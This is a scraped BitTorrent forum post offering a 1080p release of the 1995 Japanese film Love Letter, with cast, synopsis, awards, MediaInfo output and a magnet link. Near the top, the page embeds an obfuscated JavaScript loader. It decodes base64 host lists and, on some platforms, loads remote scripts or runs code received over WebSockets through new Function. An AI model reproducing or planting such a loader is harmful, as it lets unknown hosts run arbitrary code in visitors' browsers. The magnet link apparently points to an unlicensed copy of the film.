情书[简繁字幕].Love.Letter.1995.1080p.FriDay.WEB-DL.H264.AAC 4.17GB

版主小s 1月前 793

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 情书 / When I Close My Eyes / Letters of Love
◎片  名 Love Letter
◎年  代 1995
◎产  地 日本
◎类  别 剧情 / 爱情
◎语  言 日语
◎上映日期 1999-03(中国大陆) / 2021-05-20(中国大陆重映) / 1995-03-25(日本)
◎IMDb链接 https://www.imdb.com/title/tt0113703/
◎豆瓣评分 8.9/10 (849857人评价)
◎豆瓣链接 https://movie.douban.com/subject/1292220/
◎片  长 117分钟
◎导  演 岩井俊二 Shunji Iwai (id:1005064)
◎编  剧 岩井俊二 Shunji Iwai (id:1005064)
◎演  员 中山美穗 Miho Nakayama (id:1032915)
       丰川悦司 Etsushi Toyokawa (id:1032989)
       酒井美纪 Miki Sakai (id:1033533)
       柏原崇 Takashi Kashiwabara (id:1033202)
       范文雀 Bunjaku Han (id:1004171)
       篠原胜之 Katsuyuki Shinohara (id:1002476)
       铃木庆一 Keiichi Suzuki (id:1052012)
       田口智朗 Tomorowo Taguchi (id:1037679)
       加贺麻理子 Mariko Kaga (id:1037878)
       光石研 Ken Mitsuishi (id:1029037)
       铃木兰兰 Ranran Suzuki (id:1024976)
       盐见三省 Sansei Shiomi (id:1015203)
       中村久美 Kumi Nakamura (id:1018899)
       梅田凡乃 Hirokazu  Umeda (id:1323583)
       长田江身子  Emiko Osada (id:1323576)
       小栗香织 Kaori Oguri (id:1175825)
       神户浩 Hiroshi Kanbe (id:1018934)
       酒井敏也 Toshiya Sakai (id:1355906)
       山口诗史 Shifumi Yamaguchi (id:1385350)
       山崎一 Hajime Yamazaki (id:1054024)
       德井优 Yu Tokui (id:1029376)
       武藤寿美 Sumi Mutoh (id:1339921)
       童自荣 Zirong Tong (id:1318216)
       丽美 Remedios (id:1312516)
       筱田升 Noboru Shinoda (id:1008578)
       岩井俊二 Shunji Iwai (id:1005064)
       行定勋 Isao Yukisada (id:1023405)

◎标  签 爱情 / 日本 / 青春 / 文艺 / 经典 / 暗恋 / 初恋 / 唯美

◎简  介
  日本神户某个飘雪的冬日,渡边博子(中山美穗)在前未婚夫藤井树的两周年祭日上又一次悲痛到不能自已。正因为无法抑制住对已逝恋人的思念,渡边博子在其中学同学录里发现“藤井树” 在小樽市读书时的地址时,依循着寄发了一封本以为是发往天国的情书。                                    
                                不想不久渡边博子竟然收到署名为“藤 井树(中山美穗)”的回信,经过进一步了解,她知晓此藤井树是一个同她年纪相仿的女孩,且还是男友藤井树(柏原崇)少年时代的同班同学。为了多了解一些昔日恋人在中学时代的情况,渡边博子开始与女性藤井树书信往来。而藤井树在不断的回忆中,渐渐发现少年时代与她同名同姓的那个藤井树曾对自己藏了一腔柔情。

◎获奖情况 (共8项)
  第19届日本电影学院奖 (1996)
  话题奖 最具话题演员奖
   └──丰川悦司 (id:1032989)
  最佳影片(提名)
  最佳男配角(提名)
   └──丰川悦司 (id:1032989)
  最佳配乐(提名)
   └──丽美 (id:1312516)
  最佳新人

  第20届报知映画赏 (1995)
  最佳导演
   └──岩井俊二 (id:1005064)
  最佳女主角
   └──中山美穗 (id:1032915)
  最佳男配角
   └──丰川悦司 (id:1032989)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 333175358154814886423953612444894950827 (0xFAA73D6A19FA29823F95D0966956F5AB)

  4. Complete name                            : Love.Letter.1995.1080p.FriDay.WEB-DL.H2[email protected]

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 4.17 GiB

  8. Duration                                 : 1 h 56 min

  9. Overall bit rate                         : 5 119 kb/s

  10. Encoded date                             : UTC 2021-08-14 15:55:08

  11. Writing application                      : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : AVC

  16. Format/Info                              : Advanced Video Codec

  17. Format profile                           : [email protected]

  18. Format settings                          : 3 Ref Frames

  19. Format settings, CABAC                   : No

  20. Format settings, Reference frames        : 3 frames

  21. Format settings, GOP                     : M=1, N=30

  22. Codec ID                                 : V_MPEG4/ISO/AVC

  23. Duration                                 : 1 h 56 min

  24. Bit rate                                 : 4 988 kb/s

  25. Width                                    : 1 920 pixels

  26. Height                                   : 1 080 pixels

  27. Display aspect ratio                     : 16:9

  28. Frame rate mode                          : Constant

  29. Frame rate                               : 30.000 FPS

  30. Color space                              : YUV

  31. Chroma subsampling                       : 4:2:0

  32. Bit depth                                : 8 bits

  33. Scan type                                : Progressive

  34. Bits/(Pixel*Frame)                       : 0.080

  35. Stream size                              : 4.06 GiB (97%)

  36. Language                                 : English

  37. Default                                  : Yes

  38. Forced                                   : No


  39. Audio

  40. ID                                       : 2

  41. Format                                   : AAC LC

  42. Format/Info                              : Advanced Audio Codec Low Complexity

  43. Codec ID                                 : A_AAC-2

  44. Duration                                 : 1 h 56 min

  45. Bit rate                                 : 128 kb/s

  46. Channel(s)                               : 2 channels

  47. Channel layout                           : L R

  48. Sampling rate                            : 44.1 kHz

  49. Frame rate                               : 43.066 FPS (1024 SPF)

  50. Compression mode                         : Lossy

  51. Stream size                              : 107 MiB (3%)

  52. Language                                 : Japanese

  53. Default                                  : Yes

  54. Forced                                   : No


  55. Text #1

  56. ID                                       : 3

  57. Format                                   : UTF-8

  58. Codec ID                                 : S_TEXT/UTF8

  59. Codec ID/Info                            : UTF-8 Plain Text

  60. Duration                                 : 1 h 52 min

  61. Bit rate                                 : 34 b/s

  62. Count of elements                        : 1437

  63. Stream size                              : 28.4 KiB (0%)

  64. Title                                    : Chinese Simplified

  65. Language                                 : Chinese

  66. Default                                  : Yes

  67. Forced                                   : No


  68. Text #2

  69. ID                                       : 4

  70. Format                                   : UTF-8

  71. Codec ID                                 : S_TEXT/UTF8

  72. Codec ID/Info                            : UTF-8 Plain Text

  73. Duration                                 : 1 h 52 min

  74. Bit rate                                 : 34 b/s

  75. Count of elements                        : 1437

  76. Stream size                              : 28.4 KiB (0%)

  77. Title                                    : Chinese Traditional

  78. Language                                 : Chinese

  79. Default                                  : No

  80. Forced                                   : No




TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:E83A9B781904483E1BC18B4F64652D89FA263F32
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回